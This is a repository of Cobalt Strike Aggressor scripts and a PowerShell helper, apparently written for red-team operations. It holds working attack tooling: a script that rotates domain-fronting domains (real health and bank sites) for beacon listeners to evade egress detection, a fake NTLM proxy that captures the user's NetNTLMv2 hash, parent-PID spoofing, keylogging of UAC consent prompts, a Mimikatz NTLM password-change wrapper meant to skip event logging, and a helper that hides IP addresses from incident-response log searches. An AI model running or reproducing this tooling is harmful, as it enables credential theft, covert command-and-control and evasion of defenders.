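/.gitignore:
--------------------------------------------------------------------------------
pushover.cna
virustotal.cna
--------------------------------------------------------------------------------
/Blacklist.cna:
--------------------------------------------------------------------------------
# Blacklist.cna
# Author: Vincent Yiu @vysecurity
# Not responsible for you losing shells, check the blacklists before using.
#
# Each entry is a @(user, computer) pair. A beacon whose user/computer pair
# is listed is exited and removed as soon as it checks in.
#
# NOTE(review): the "John *" style entries read like wildcards, but neither
# the `isin` test in beacon_initial nor the `in` test in exists() does
# wildcard matching as written - confirm the intended comparison (iswm?)
# before relying on these patterns.

# NOTE(review): declared as @blacklist but used as $blacklist below; Sleep
# treats the sigil as a type hint on the same name as far as I know - confirm.
global('@blacklist');

#$blacklist_pc = @("JOHN-PC", "TEQUILABOOMBOOM", "ANTONY-PC", "XFIIP-PC", "HOME-OFF-D5F0AC");
#$blacklist_user = @();

# @(user, computer) pairs
$blacklist = @(
    @("John *","JOHN-PC"),
    @("janettdoe *","TEQUILABOOMBOOM"),
    @("Antony *","ANTONY-PC"),
    @("xfIIp *","XFIIP-PC"),
    @("Dave *","HOME-OFF-D5F0AC")
);

on beacon_initial{
    # $1 - ID of beacon

    $pcname = binfo($1, "computer");
    $username = binfo($1, "user");

    if (@($username, $pcname) isin $blacklist){
        # blog() takes the beacon id as its first argument, as every other
        # call in this file does.
        blog($1, "[!] Blacklisted Pair: $username, $pcname");
        blog($1, "Exiting...");
        bexit($1);
        blog($1, "Removing...");
        bremove($1);
    }
}

# add_blacklist(@beacon_ids) - blacklist the user/computer pair of each beacon
# and then print the resulting list.
sub add_blacklist{
    # $1 = array of beacon ids
    foreach $beacon ($1){
        #elog($beacon);
        $pair = @(binfo($beacon, "user"), binfo($beacon, "computer"));
        if (!exists($pair)){
            blog($beacon, "[*] Adding $pair to blacklist");
            add($blacklist, $pair, -1);
        }
        else{
            blog($beacon, "[!] $pair already exists in blacklist");
        }
    }
    # $beacon still holds the last id from the loop; the list is shown there.
    show_blacklist($beacon);
}

# remove_blacklist(@beacon_ids) - drop the user/computer pair of each beacon
# from the list and then print the resulting list.
sub remove_blacklist{
    # $1 = array of beacon ids
    foreach $beacon ($1){
        $pair = @(binfo($beacon, "user"), binfo($beacon, "computer"));
        if (exists($pair)){
            blog($beacon, "[*] Removing $pair from blacklist");
            remove($blacklist, $pair);
        }
        else{
            blog($beacon, "[!] $pair does not exist in blacklist");
        }
    }
    show_blacklist($beacon);
}

# show_blacklist($beacon_id) - print the current list to that beacon's console.
sub show_blacklist{
    blog($1, "========================");
    # Size of the list itself; $1 is the beacon id, not the list.
    if (size($blacklist) <= 0){
        blog($1, "[!] Empty Blacklist");
    }
    foreach $pair ($blacklist){
        blog($1, "Blacklist: $pair");
    }
    blog($1, "========================");
}

popup beacon_bottom {
    menu "Blacklist"{
        item "Add to Blacklist" {
            add_blacklist($1);
        }
        item "Remove from Blacklist" {
            remove_blacklist($1);
        }
        item "Show Blacklist" {
            show_blacklist($1);
        }
    }
}

# exists(@pair) - 1 if @("user", "computer") is already in $blacklist, else 0.
# Returns numeric 1/0 rather than the barewords true/false, whose truth value
# is not guaranteed in Sleep.
sub exists{
    if ($1 in $blacklist){
        return 1;
    }
    else{
        return 0;
    }
}


alias blacklist-add {
    # $1 = beacon_id
    add_blacklist(@($1));
}

alias blacklist-remove {
    # $1 = beacon_id
    remove_blacklist(@($1));
}

alias blacklist-show {
    show_blacklist($1);
}

--------------------------------------------------------------------------------
/HAMMERTHROW.cna:
--------------------------------------------------------------------------------
# HAMMERTHROW
# Rotates domain fronting domains for beacon HTTPS listener every 5 minutes.
# This ensures that your beacon domains are not limited to one domain, and is actively changing to avoid new egress beacons from being detected.
# (The rotation handler further down is registered on heartbeat_10s; switch it to heartbeat_5m for the 5 minute cadence described above.)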
4 | 5 | # Quiet mode, no logging in event log 6 | $quiet = $False; 7 | 8 | global('@domains'); 9 | 10 | # Set a domain list you want to use here 11 | @domains = @("abmail.itriagehealth.com","about.itriagehealth.com","app.dosehealthcare.com","appmanager.linkhealth.com","appmanager-test.linkhealth.com","appmanager-stage.linkhealth.com","assets.healthcare.com","assets.stg.healthcare.com","assets.verticalhealth.net","assets.westfieldhealth.com","besthealth.save.ca","bhn.burdhealth.com","careers.gdhealth.com","cdn1.healthians.com","cdn2.beyondhealthy.ca","cdn2.healthians.com","cdn3.beyondhealthy.ca","cdn3.healthians.com","cdn4.healthians.com","cdn.ahchealthenews.com","cdn.ahealthypassion.com","cdn.beyondhealthy.ca","cdn.confer.health","cdn.crickethealth.com","cdn-css.health.com","cdn.healthcare.com","cdn.healthcare.se","cdn.healthguru.com","cdn.healthscion.com","cdn.healthyplace.com","cdn.healthytraditions.com","cdn-img.health.com","cdn-js.health.com","cdn.kivihealth.com","cdn.passporthealthglobal.com","cdn.passporthealthusa.com","cdn.patientfocus.myhealthfeed.com","cdn.smart-monitor.myhealthfeed.com","cdn-stage.linkhealth.com","cdn.universityhealthnews.com","cf.goziohealth.com","cf.healthcare.com","claims.linkhealth.com","client.healthiestyou.com","connect.uclahealth.org","demo.healthjoiner.com","desktop.healthchat.md","developer.linkhealth.com","developer-stage.linkhealth.com","faq.wahealthplanfinder.org","files.kivihealth.com","garciniacambogiaearthshealthie.simplesite.com","go.dosehealthcare.com","healthbeautyexample.upplication.com","health.facty.com","healthelife.healtheintent.com","healthhub.medibankhealth.com.au","healthpartneradvantage.com","health.tvbs.com.tw","healthy-mom-daily.com","healthymatrix.myisagenix.com","hsafacts.healthequity.com","ibmsol.integrahealth.com","icrm-static.hospitals.healthgrades.com","images.eqcohealth.io","images.smarthealth.me","imshealth.e.sparkpost.com","jobs.atlantichealth.org","media-dev.healthination.com","media.elsevierhealth.co
m.au","media.healthdirect.org.au","media.healthination.com","media.healthiq.com","mednet.uclahealth.org","member.bluezonehealth.co.uk","member.healthiestyou.com","nahis.animalhealthaustralia.com.au","namp.animalhealthaustralia.com.au","new.ccihealth.org","portal.altegrahealth.com","portal.apostrophehealth.com","portal.burdhealth.com","prodstaticcdn.stanfordhealthcare.org","provider.apostrophehealth.com","provider.linkhealth.com","provider-stage.linkhealth.com","requestinfo.publichealthonline.gwu.edu","resources.static.evaliahealth.com","secure.menshealth.com","secure.womenshealthmag.com","social.drivemyhealth.com","sponsored.health.com","ssl.sociohealth.co.jp","staging-about.itriagehealth.com","static.healthcare.com","static.healthination.com","stg-images.eqcohealth.io","student.healthiestyou.com","styles.smarthealth.me","subscription-assets.health.com","tiads.health.com","tokensale.simplyvitalhealth.com","uat.healthepetsnow.com","uatstaticcdn.stanfordhealthcare.org","ushealthadvisors.vivialsite.net","wacohealthandwellness.smugmug.com","www.acadiahealthcarecareers.com","www.africahealthexhibition.com","www.arabhealthonline.com","www.baldurhealthcare.com","www.buildinghealthcare-exhibition.com","www.careersatmainehealth.org","www.drivemyhealth.com","www.h1healthcare.com","www.healthandsafety-jobs.co.uk","www.health.com","www.healthbeckon.com","www.healthelivingfilm.com","www.healthevoices16.com","www.healthcombined.com","www.healthrecruitmentfair.com","www.healthystockport.co.uk","www.ihealthkonnect.com","www.lakelandbehavioralhealth.com","www.lusciniahealth.com","www.manateehealthcaresystem.com","www.mangohealth.com","www.massivehealth.com","www.medstarhealthjobs.org","www.melonhealth.com","www.peacehealth.org","www.platformqhealth.com","www.saudihealthexhibition.com","www.sesamehealthyplay.org","www.sociohealth.co.jp","www.soleohealth.com","www.southtexashealthsystem.com","www.swhealthcaresystem.com","www.teamhealth.com","www.uclahealthcareers.org","www.usanahealth
.net","www.valleyhealthsystemlv.com","admin.interbankbenefit.pe","agl.medibank.com.au","arkansas.protectmybank.com","assets.nieuwsbank.nl","bank.coveredsec.com","bankia-mobile.brandcrumb.com","bank.smugmug.com","bebetter.medibank.com.au","beta.cdn.bankersalmanac.com","brokercdn2.pnbank.info","brokercdn5.pnbank.info","careers.bankofireland.com","careers.cobank.com","cdn.amarbank.co.id","cdn.bankersalmanac.com","cdn.bankforeclosuressale.com","cdn.banksalad.com","cdn.foodbank.io","cdn.nieuwsbank.nl","cdn.southbankresearch.com","cdn.spankbank.io","cem2.lloydsbank.co.uk","certification.protectmybank.com","cf.sports.mb.softbank.jp","content-medibank.ritualize.com","corporate.medibank.com.au","databank.501st.com","dbanksphotography.smugmug.com","developer.softbankrobotics.com","dev.libertybank.net","docs.selfbank.es","donbanka.smugmug.com","duxyphotobank.smugmug.com","ebanking.ekuantia.es","fu11.my.softbank.jp","healthhub.medibankhealth.com.au","homebanking.hiway.org","images.spankbank.io","irishlab.cytobank.org","ite.verify.kiwibank.co.nz","leftbankhome.smugmug.com","martin-windebank.smugmug.com","members.medibank.com.au","merchants.firstbanks.com","merch.bankofamerica.com","mtbank.cdn.online-trading-solutions.com","myautoloan.broadway.bank","myburbank.smugmug.com","oncard.zionsbank.com","p2bkunisbank.simplesite.com","ppd-developer.softbankrobotics.com","production-cdn2.patternbank.com","production-cdn1.patternbank.com","production-cdn.patternbank.com","publicdemobankingsample.locationlandingpages.com","reh2-developer.softbankrobotics.com","service.protectmybank.com","showmeopportunities.bankofireland.com","ssl.clickbank.net","stage-my.softbankrobotics.com","stage-store.softbankrobotics.com","stage-www.softbankrobotics.com","static.interbankbenefit.pe","static.medibank.com.au","st.fu11.my.softbank.jp","tedleeeubanks.smugmug.com","test-cdn.amarbank.co.id","verify.kiwibank.co.nz","vip.medibank.com.au","wc.banklotus.com.tw","wc.csbank.com.tw","wc.ksbank.com.tw","wc.ucbank.co
m.tw","www.bankenberatungszentrum.ch","www.bankmelb.com.au","www.bankofmelbourne.com","www.bankoftampa.com","www.bankofmelbourne.com.au","www.banksa.com.au","www.banksrum.com","www.buddybank.com","www.columbiabankmerchantservices.com","www.greatsouthernbankpaymentsolutions.com","www.interbankbenefit.pe","www.kbankegirls.com","www.libertybank.net","www.medibank.com.au","www.melbank.com","www.nextbank.ph","www.republicbankmerchantservices.com","www.safetydatabank.jp","www.softbankrobotics.com","www.starbanksadventure.com","www.websterbankmerchantservices.com","www.worldbank.org","1706bbc01.adambank.com","100500.rocketbank.ru","admin-staging.coloradok12financialtransparency.com","blog.financialengines.com","branches.onemainfinancial.com","calculators.evenfinancial.com","careers.snifinancial.com","cla.evenfinancial.com","corp.financialengines.com","financialaid.wvu.edu","financialbuilders.truecar.com","financialmarketstoolkit.cliffordchance.com","financialpost.scribblelive.com","financialservices.wvu.edu","financials.morningstar.com","i.financialengines.com","local.gmfinancial.com","m-ink.etradefinancial.com","news.efinancialcareers.com","news.pilotaws.efinancialcareers.com","partnerpage.evenfinancial.com","webstore.efinancialcareers.com","widgets.efinancialcareers.com","widgets.pilotaws.efinancialcareers.com","www.financialedufcu.com","www.paccarfinancial.com.au","www.retailfinancialcareers.com","www.yesplanfinancial.ca","accreditation.wvu.edu","anhs.cusdcreditrecovery.com","api.creditsafebci.com","bridges.cusdcreditrecovery.com","ca.creditcards.com","calprep.cusdcreditrecovery.com","canada.creditcards.com","cdn.creditcards.com","creditunion1.truecar.com","cvhs.cusdcreditrecovery.com","data.kanzen-creditcard.com","dhhs.cusdcreditrecovery.com","image.creditseva.com","images.creditcardcompare.com.au","lab-uat.credit-suisse.com","schs.cusdcreditrecovery.com","shs.cusdcreditrecovery.com","sjhhs.cusdcreditrecovery.com","ths.cusdcreditrecovery.com"); 12 | 13 | $size = 
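size(@domains);

# Set how many domains you want to use for beaconing. Don't put too many at once
$num = 3;

# Rotation gate. Sleep has no $True/$False builtins, so comparing two
# undefined variables was always true and the checks in on ready could never
# stop the rotation; use 1/0 instead.
$start = 1;

# heartbeat_10s
# heartbeat_5m
# Up to you :)

# Every tick: pick $num distinct domains, then re-create the HTTP/HTTPS
# egress listener with the first domain as the stager host and the rest as
# beacon hosts.
on heartbeat_10s {
    # Nothing to do until on ready has validated $num against the list.
    if ($start != 1){
        return;
    }

    # Pick $num distinct entries. Note @domains contains at least one
    # repeated entry, so the distinct pool is a little smaller than $size.
    @cactus = @();
    for ($a = 0; $a < $num; $a++){
        # get a random domain from the list; keep drawing until it is not
        # already in @cactus
        $dom = rand(@domains);
        while ($dom in @cactus){
            $dom = rand(@domains);
        }
        # Add to cactusfront
        add(@cactus, $dom);
    }

    if ($quiet == $False){
        elog("\cB[+] HAMMERTHROW rotating domains:");
    }

    # Lucky first one will be the stager
    if ($quiet == $False){
        elog(" \cB[STAGER] \c9" . @cactus[0]);
    }

    # Rest will be the beaconing domains, comma separated
    $domStr = "";
    for ($a = 1; $a < $num; $a++){
        $domStr = $domStr . @cactus[$a] . ",";
    }
    # drop the trailing comma
    $domStr = substr($domStr, 0, -1);
    if ($quiet == $False){
        elog(" \cB[BEACON] \c9" . $domStr);
    }

    # Find the (last matching) HTTP/HTTPS listener and pull its port out of
    # the listener description.
    $listener = "";
    $type = "";
    foreach $name (listeners()) {
        $a = listener_describe($name);
        $b = indexOf($a, "beacon_https/reverse_https", 0);
        $c = indexOf($a, "beacon_http/reverse_http", 0);

        # NOTE(review): indexOf() yields 0 when the match is at offset 0,
        # which this test treats as "not found" - confirm the description
        # never starts with the payload name.
        if ($b || $c){
            $listener = $name;
            if ($b){
                $type = "https";
            }
            else{
                $type = "http";
            }

            # NOTE(review): assumes the description ends in "...:<port>)" -
            # confirm against listener_describe() output.
            $portpos = indexOf($a, ":", -10);
            $port = substr($a, $portpos);

            $portpos = indexOf($port, ")");
            $port = substr($port, 0, $portpos);

            $port = strrep($port, ":", "");
        }
    }

    # `-eq` is not a Sleep comparison; string equality is `eq`. Without a
    # listener there is nothing to rotate, so stop here instead of creating
    # a listener with an empty name.
    if ($listener eq ""){
        elog("\c4[ERROR] Cannot discover egress listener, please restart agent when an egress listener is created over HTTP or HTTPS");
        return;
    }

    if ($quiet == $False){
        elog("\cB[*] Detected listener name: \c9 " . $listener . " ( $+ $type $+ : $+ $port $+ ) \r\n");
    }

    # delete existing listener
    # listener_delete($listener);

    # create new listener
    # $1 = name
    # $2 = payload type
    # $3 = host
    # $4 = port
    # $5 = beacons
    # `==` is numeric in Sleep (any two non-numeric strings compare equal),
    # so the https branch was taken for http listeners too; use `eq`.
    if ($type eq "https"){
        listener_create($listener, "windows/beacon_https/reverse_https", @cactus[0], $port, $domStr);
    }
    else{
        listener_create($listener, "windows/beacon_http/reverse_http", @cactus[0], $port, $domStr);
    }
}



# Validate the configuration once the script is loaded; a bad $num leaves
# $start at 0 so heartbeat_10s does nothing.
on ready {
    # NOTE(review): the leading "\H" is not a Sleep escape - probably a stray
    # backslash.
    elog("\HAMMERTHROW rotations are now initiated");
    $start = 1;
    if ($num > $size){
        elog("\c4[ERROR] The selection number of domains is larger than the number of domains supplied in the list");
        $start = 0;
    }

    if ($num < 2){
        elog("\c4[ERROR] We need at least a total list of 2 domains, one for the stager, and one for beaconing");
        $start = 0;
    }

    #

    elog("\c8[+] A total of " . $size . 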
" domains loaded"); 134 | 135 | } -------------------------------------------------------------------------------- /Invoke-CredLeak.ps1: -------------------------------------------------------------------------------- 1 | # Original code by @leftp 2 | # https://gist.github.com/leftp/a3330f13ac55f584239baa68a3bb88f2 3 | 4 | function Invoke-ProxyServer { 5 | 6 | <# 7 | 8 | .SYNOPSIS 9 | 10 | This function starts the proxy server on 8080 11 | 12 | .DESCRIPTION 13 | 14 | This function starts the proxy server on 8080 15 | 16 | 17 | #> 18 | 19 | Param( 20 | 21 | 22 | ) 23 | 24 | $code = "f132ae278ad7f7a0" 25 | $e = "Access Denied" 26 | $e2 = "" 27 | 28 | $nbdomainname = strtonullspacedhex("NODOMAIN") 29 | $dnsdomainname = strtonullspacedhex("NODOMAIN.COM") 30 | $computername = strtonullspacedhex("NO") 31 | $dnscomputername = strtonullspacedhex("NO.NODOMAIN.COM") 32 | 33 | $nbdomainnamelen = strlentohexint $nbdomainname 4 34 | $computernamelen = strlentohexint $computername 4 35 | $dnsdomainnamelen = strlentohexint $dnsdomainname 4 36 | $dnscomputernamelen = strlentohexint $dnscomputername 4 37 | 38 | $targetinfo = "0200"+$nbdomainnamelen+$nbdomainname+"0100"+$computernamelen+$computername+"0400"+$dnsdomainnamelen+$dnsdomainname+"0300"+$dnscomputernamelen+$dnscomputername+"0500"+$dnsdomainnamelen+$dnsdomainname+"0000"+"0000" 39 | 40 | $t1=hextoint "38000000" 41 | $t2=strlentohexint $nbdomainname 4 42 | $t2=hextoint $t2 43 | $t=($t1+$t2) 44 | $targetinfooffset = strtohexint $t 8 45 | 46 | $targetinfolen = strlentohexint $targetinfo 4 47 | $hexcode = "4e544c4d53535000"+"02000000"+$nbdomainnamelen+$nbdomainnamelen+"38000000"+"958289e2"+$code+"0000000000000000"+$targetinfolen+$targetinfolen+$targetinfooffset+"0000000000000000"+$nbdomainname+$targetinfo 48 | 49 | $Encoding = new-object system.text.asciiencoding; 50 | $Buffer=new-object system.byte[] 1024; 51 | $endpoint = new-object System.Net.IPEndPoint ([system.net.ipaddress]::loopback, 8080) 52 | $listener = new-object 
System.Net.Sockets.TcpListener $endpoint 53 | $listener.start() 54 | while ($true) 55 | { 56 | $client = $listener.AcceptTcpClient() 57 | $Stream = $client.GetStream() 58 | $reader = New-Object System.IO.StreamReader $Stream 59 | $writer = New-Object System.IO.StreamWriter $Stream 60 | #While($client.connected) 61 | #{ 62 | $Result="" 63 | While($Stream.DataAvailable) 64 | { 65 | $Read=$Stream.Read($Buffer,0,1024); 66 | $Result+=$Encoding.GetString($Buffer, 0, $Read) 67 | #$Result+=$Buffer[0..$Read] 68 | } 69 | if ($Result -ne "") 70 | { 71 | $Result 72 | if ($Result -like "CONNECT*" -or $Result -like "GET*") 73 | { 74 | if ($Result -like "*Proxy-Authorization:*") 75 | { 76 | $b=($Result.split("`r`n") | Select-String -Pattern ("Proxy-Authorization")).tostring() 77 | $b=$b.split(" ")[$b.split(" ").length-1].split("`r`n")[0] 78 | $b=[System.Convert]::FromBase64String($b) -join " " 79 | $b=ByteArray-to-string $b 80 | if ($b.substring(8*2,4*2) -eq "01000000") 81 | { 82 | $t=string-to-bytearray $hexcode 83 | $t=[System.Convert]::ToBase64String($t) 84 | $res="HTTP/1.1 407 Proxy Authorization Required`r`nProxy-Authenticate: Negotiate " + $t + "`r`nContent-Type: text/html`r`nContent-Length: " + $e.length.tostring() + "`r`n`r`n" + $e 85 | $writer.write($res) 86 | $writer.flush() 87 | } 88 | if ($b.substring(8*2,4*2) -eq "03000000") 89 | { 90 | $offset_NTLMresponse = hextoint $b.substring(24*2,4*2) 91 | $length_NTLMresponse = hextoint $b.substring(20*2,2*2) 92 | $NTProofStr = $b.substring($offset_NTLMresponse*2,16*2) 93 | $NTLMresponse = $b.substring(($offset_NTLMresponse*2)+$NTProofStr.length,$length_NTLMresponse*2-$NTProofStr.length) 94 | $offset_domain = hextoint $b.substring(32*2,4*2) 95 | $length_domain = hextoint $b.substring(28*2,2*2) 96 | $offset_user = hextoint $b.substring(40*2,4*2) 97 | $length_user = hextoint $b.substring(36*2,2*2) 98 | $domain = $b.substring($offset_domain*2,$length_domain*2) 99 | $user = $b.substring($offset_user*2,$length_user*2) 100 | 
$user=hextostr $user 101 | $domain= hextostr $domain 102 | write-host "" 103 | write-host "" 104 | write-host $user"::"$domain":"$code":"$NTProofStr":"$NTLMresponse 105 | write-host "" 106 | write-host "" 107 | $res="HTTP/1.1 200 OK`r`nContent-Type: text/html`r`nContent-Length: " + $e2.length.tostring() + "`r`n`r`n" + $e2 108 | $writer.write($res) 109 | $writer.flush() 110 | } 111 | } 112 | else 113 | { 114 | $res="HTTP/1.1 407 Proxy Authorization Required`r`nProxy-Authenticate: Negotiate`r`nProxy-Authenticate: NTLM`r`nContent-Type: text/html`r`nContent-Length: " + $e.length.tostring() + "`r`n`r`n" + $e 115 | $writer.write($res) 116 | $writer.flush() 117 | } 118 | } 119 | } 120 | #} 121 | $client.Dispose() 122 | $writer.Dispose() 123 | $reader.Dispose() 124 | $stream.Dispose() 125 | } 126 | $listener.stop() 127 | 128 | } 129 | 130 | function Invoke-CredLeak { 131 | 132 | <# 133 | 134 | .SYNOPSIS 135 | 136 | This function starts the proxy server on 8080 137 | 138 | .DESCRIPTION 139 | 140 | This function starts the proxy server on 8080 141 | 142 | 143 | #> 144 | 145 | Param( 146 | 147 | 148 | ) 149 | 150 | $wc = New-Object System.Net.WebClient 151 | $WebProxy = New-Object System.Net.WebProxy("http://127.0.0.1:8080",$true) 152 | $WebProxy.UseDefaultCredentials = $true 153 | $wc.Proxy = $WebProxy 154 | $wc.DownloadString("http://www.google.com") 155 | 156 | } 157 | 158 | 159 | 160 | function String-to-ByteArray ($String) 161 | { 162 | $ByteArray=@() 163 | For ( $i = 0; $i -lt ($String.Length/2); $i++ ) 164 | { 165 | $Chars=$String.Substring($i*2,2) 166 | $Byte=[Byte] "0x$Chars" 167 | $ByteArray+=$Byte 168 | } 169 | Return $ByteArray 170 | } 171 | 172 | function ByteArray-to-String ($ByteArray) 173 | { 174 | ForEach ( $Byte In $ByteArray.ToString().Split(" ") ) 175 | { 176 | $String="$String"+[Convert]::ToString($Byte,16).ToUpper().PadLeft(2,"0") 177 | } 178 | Return $String 179 | } 180 | 181 | function strtohex ($str) 182 | { 183 | $b=$str.ToCharArray(); 184 | Foreach 
($element in $b) 185 | { 186 | $c=$c+[System.String]::Format("{0:X}",[System.Convert]::ToUInt32($element)) 187 | } 188 | return $c 189 | } 190 | 191 | function hextostr ($str) 192 | { 193 | $temp="" 194 | for ($i = 0; $i -lt $str.length; $i += 2) 195 | { 196 | $temp1=[convert]::Toint32($str.substring($i,2),16) 197 | if ($temp1 -ne 0) 198 | { 199 | $temp=$temp+[char]$temp1 200 | } 201 | } 202 | return $temp 203 | } 204 | 205 | function strtonullspacedhex ($str) 206 | { 207 | $b=$str.ToCharArray(); 208 | Foreach ($element in $b) 209 | { 210 | $c=$c+[System.String]::Format("{0:X}",[System.Convert]::ToUInt32($element))+"00" 211 | } 212 | return $c 213 | } 214 | 215 | function strtohexint ($str,$length) 216 | { 217 | $tmp="{0:X0}" -f $str 218 | if ($tmp.length -eq 1) 219 | { 220 | $tmp="0"+$tmp 221 | } 222 | if ($length-$tmp.length -gt 0) 223 | { 224 | $tmp=$tmp+"0"*($length-$tmp.length) 225 | } 226 | return $tmp 227 | } 228 | 229 | function strlentohexint ($str,$length) 230 | { 231 | $tmp="{0:X0}" -f ($str.length/2) 232 | if ($tmp.length -eq 1) 233 | { 234 | $tmp="0"+$tmp 235 | } 236 | $tmp=$tmp+"0"*($length-$tmp.length) 237 | return $tmp 238 | } 239 | 240 | Function hextoint ($h) { 241 | $string="" 242 | For ( $i = 0; $i -lt ($h.Length/2); $i++ ) { 243 | $string=$string+$h.substring(($h.length)-($i*2)-2,2) 244 | } 245 | Return [convert]::Toint32($string,16) 246 | } 247 | 248 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Contains a bunch of CobaltStrike Aggressor Scripts 2 | 3 | Ping: Converts an IP address to Hex equivalent and uses ping command. Prevents IR regex for IP addresses. 4 | 5 | Auto-prepenv: Automatically preps the environment on initial beacon 6 | 7 | VNC-psh: Runs a VNC server on the target 8 | 9 | Credleak: Starts a proxy server on localhost 8080 and connects to it to leak the NetNTLMv2 hash. 
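--------------------------------------------------------------------------------
/auto-keylog-consent.cna:
--------------------------------------------------------------------------------

# keylognow($bid, &callback) - list processes on the beacon and call
# &callback($bid, $pid, $arch) once for every consent.exe entry found.
sub keylognow {
    bps($1, lambda({
        # $arch is assigned below, so it belongs in local() with the others
        # rather than leaking into script scope.
        local('$pid $name $entry $arch');
        foreach $entry (split("\n", $2)) {
            # assumes bps output columns are name, ppid, pid, arch - the same
            # layout auto-prepenv.cna relies on
            ($name, $null, $pid, $arch) = split("\\s+", $entry);
            if ($name eq "consent.exe") {
                [$callback: $1, $pid, $arch];
            }
        }
    }, $callback => $2));
}

alias keylog-consent {
    btask($1, "Tasked Beacon to find consent.exe and keylog it");
    keylognow($1, {
        bkeylogger($1, $2, $3);
    });
}
--------------------------------------------------------------------------------
/auto-prepenv.cna:
--------------------------------------------------------------------------------
# Raphael Mudge released code to search for explorer.exe and set it as a Parent PID.
# https://www.cobaltstrike.com/aggressor-script/functions.html#bppid
#
# Just add on_initial to make it do it on arrival.

# getexplorerpid($bid, &callback);
# Calls &callback($bid, $pid) once per explorer.exe entry in the process
# list, so with several sessions the last match wins for bppid.
sub getexplorerpid {
    bps($1, lambda({
        local('$pid $name $entry');
        foreach $entry (split("\n", $2)) {
            ($name, $null, $pid) = split("\\s+", $entry);
            if ($name eq "explorer.exe") {
                [$callback: $1, $pid];
            }
        }
    }, $callback => $2));
}

alias prepenv {
    btask($1, "Tasked Beacon to find explorer.exe and make it the PPID");
    getexplorerpid($1, {
        bppid($1, $2);
    });
}

# Run prepenv automatically for every new beacon.
on beacon_initial {
    fireAlias($1, "prepenv");
}
--------------------------------------------------------------------------------
/credleak.cna:
--------------------------------------------------------------------------------
# Original idea and code by @leftp
# https://gist.github.com/leftp/a3330f13ac55f584239baa68a3bb88f2
#
# I took the code and modified it into a usable form.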
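# Author: @vysecurity

# credleak - runs the two halves of Invoke-CredLeak.ps1 as separate
# powershell jobs. Invoke-ProxyServer never returns (its accept loop is
# unbounded), so the first job stays alive until it is killed by hand, as
# the final blog() reminds the operator.
alias credleak {
    btask($1, "Starting Proxy server on 8080");
    bpowershell_import($1, script_resource("Invoke-CredLeak.ps1"));
    bpowershell($1, "Invoke-ProxyServer");
    btask($1, "Connecting to proxy in attempt to leak hash");
    bpowershell($1, "Invoke-CredLeak");
    blog($1, "Kill the job after the hash has been leaked. Do a shell netstat -ano | findstr /i 8080 then kill the process");
}

beacon_command_register("credleak", "Starts up a proxy server on 8080 and connects to it to leak NetNTLMv2 hash",
    "Syntax: credleak\n" .
    "Starts up a proxy server on localhost:8080 and connects to it to leak NetNTLMv2 hash of the low privilege user");

--------------------------------------------------------------------------------
/http.cna:
--------------------------------------------------------------------------------
import java.io.BufferedReader;
import java.io.DataOutputStream;
import java.io.InputStreamReader;
import java.net.HttpURLConnection;
import java.net.URL;

# send - example alias: GET https://www.google.com and log the response.
alias send {
    $method = "GET";
    $url = "https://www.google.com";
    $body = "";

    $response = sendhttp($method, $url, $body);
    elog($response);
}

# sendhttp($method, $url, $body) - issue an HTTP request with a fixed
# User-Agent and return the response text.
#   $1 = method (GET/POST)
#   $2 = URL
#   $3 = POST body (a CRLF is appended)
sub sendhttp{
    local('$method $url $body $USER_AGENT $urlobj $con $wr $responseCode $in $inputLine $response');

    $method = $1;
    $url = $2;
    $body = $3 . "\r\n";

    $USER_AGENT = "Mozilla/5.0";

    $urlobj = [new URL: $url];
    $con = [$urlobj openConnection];
    [$con setRequestMethod: $method];
    [$con setRequestProperty: "User-Agent", $USER_AGENT];

    # HttpURLConnection silently turns a GET into a POST as soon as
    # getOutputStream() is used, so only write a body for non-GET requests.
    if ($method ne "GET"){
        [$con setDoOutput: true];
        $wr = [new DataOutputStream: [$con getOutputStream]];
        [$wr writeBytes: $body];
        [$wr flush];
        [$wr close];
    }

    $responseCode = [$con getResponseCode];

    $in = [new BufferedReader: [new InputStreamReader: [$con getInputStream]]];

    # NOTE(review): readLine() returns null at end of stream, which this
    # loop treats like "", but it also stops at the first blank line of the
    # body - responses containing an empty line are truncated.
    $inputLine = "";
    $response = "";

    $inputLine = [$in readLine];
    $response = $response . $inputLine . "\r\n";

    while ($inputLine ne ""){
        $inputLine = [$in readLine];
        $response = $response . $inputLine . "\r\n";
    }

    [$in close];

    return $response;
}
--------------------------------------------------------------------------------
/mimikatz_addons.cna:
--------------------------------------------------------------------------------
# Cobalt Strike Mimikatz Enhancement CNA Addon
# Created by @vysecurity
#
# Credits to @armitagehacker (cobaltstrike) and @gentilkiwi (mimikatz)

# password_change - build an lsadump::changentlm command from the alias
# arguments and run it through bmimikatz after an operator confirmation.
alias password_change {
    # $2: Username
    # $3: Old hash or password
    # $4: New hash or password
    # $5: SERVERNAME/DC/Localhost

    $user = $2;
    $old = $3;
    $new = $4;
    $server = $5;

    if ($user && $old && $new){
        $command = "lsadump::changentlm /user:$user";

        # Check if $old is a hash.
        # `ismatch` is Sleep's full-string regex match (the dashed form is
        # not a Sleep operator), so this accepts exactly a 32-hex string.
        # `.=` appends; `+=` is numeric addition in Sleep.
        if ($old ismatch '[a-fA-F0-9]{32}'){
            $command .= " /oldntlm:$old";
        }
        else {
            $command .= " /oldpassword:$old";
        }

        # Check if new is a hash
        if ($new ismatch '[a-fA-F0-9]{32}'){
            $command .= " /newntlm:$new";
        }
        else{
            $command .= " /newpassword:$new";
        }

        if ($server){
            $command .= " /server:$server";
        }
        else{
            # berror() takes the beacon id first, as the call further down does.
            berror($1, "No server specified, 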
defaulting to localhost."); 41 | } 42 | 43 | prompt_confirm("Are you sure you want to execute?\nCommand: $command", "Confirmation", { 44 | btask($1, "$command"); 45 | bmimikatz($1, "$command"); 46 | }); 47 | 48 | 49 | } 50 | else{ 51 | berror($1,"Missing parameters, you need exactly 4."); 52 | } 53 | } 54 | 55 | beacon_command_register("password_change", "Executes a password change which allows you to change the NTLM password for a given account.", 56 | "Syntax: password_change [SERVER/DC/localhost] [Username] [Known old hash or password] [New hash or password]\n" . 57 | "Uses Mimikatz's password change functionality which allows you to change the NTLM password for a given account without the setpassword event logging.\n". 58 | "Useful for situations where you do not know the cleartext original password so you can change the password quickly and reset the NTLM hash after you're done."); 59 | 60 | 61 | -------------------------------------------------------------------------------- /ping.cna: -------------------------------------------------------------------------------- 1 | # A script to allow you to ping an IP address and it will convert to Hex equivalent 2 | # Concept of IR looking for IP regex in logs by @Nebulator inspired me to write this. 
